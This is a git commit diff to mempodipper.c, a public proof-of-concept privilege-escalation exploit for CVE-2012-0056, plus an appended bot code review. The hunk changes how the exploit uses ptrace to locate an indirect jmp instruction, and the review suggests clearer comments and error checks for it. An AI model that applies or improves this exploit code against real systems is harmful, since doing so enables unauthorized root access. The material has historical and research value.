authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 17:38:32 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 18:12:08 +0100
commit513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d (patch)
tree8d22ee73ab5d88ec5fae5b661b3795cb95eb870b /mempodipper.c
parentNot always exit@plt (diff)
downloadCVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.tar.xz
CVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.zip
Search for IP of next jmp instead.
Diffstat (limited to 'mempodipper.c')
-rw-r--r--mempodipper.c10
1 files changed, 3 insertions, 7 deletions
diff --git a/mempodipper.c b/mempodipper.c
index dcc037c..e35d62a 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -17,7 +17,6 @@
#define _LARGEFILE64_SOURCE
#include <stdio.h>
-#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
@@ -126,12 +125,9 @@ unsigned long ptrace_address()
#error "That platform is not supported."
#endif
if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- return instruction_pointer + offset;
- }
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
}
}
} else {
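Review bot: The added check `(instruction & 0xffff) == 0x25ff` is documented only as `/* jmp r/m32 */`, which does not say that the word is compared in little-endian order (bytes `ff 25`, opcode FF /4 with a disp32 ModRM byte), nor that on x86-64 the same bytes encode a RIP-relative jump with a 64-bit target. I would expand the comment to `/* bytes ff 25: indirect jmp through memory (absolute disp32 on i386, disp32(%rip) on x86-64) */` so that someone analysing this proof of concept can tell which instruction the search stops on. The return value of `ptrace(PTRACE_PEEKTEXT, ...)` is also used unchecked: a failed peek returns -1, which the mask happens not to match, so an error passes silently as a non-match; clearing `errno` before the call and testing it afterwards would make that explicit. The new `if` drops the braces that the enclosing `if (instruction_pointer < upper_bound) {` uses, and `if (...) { return instruction_pointer; }` would keep the style consistent. ptrace_address() begins and ends outside this hunk.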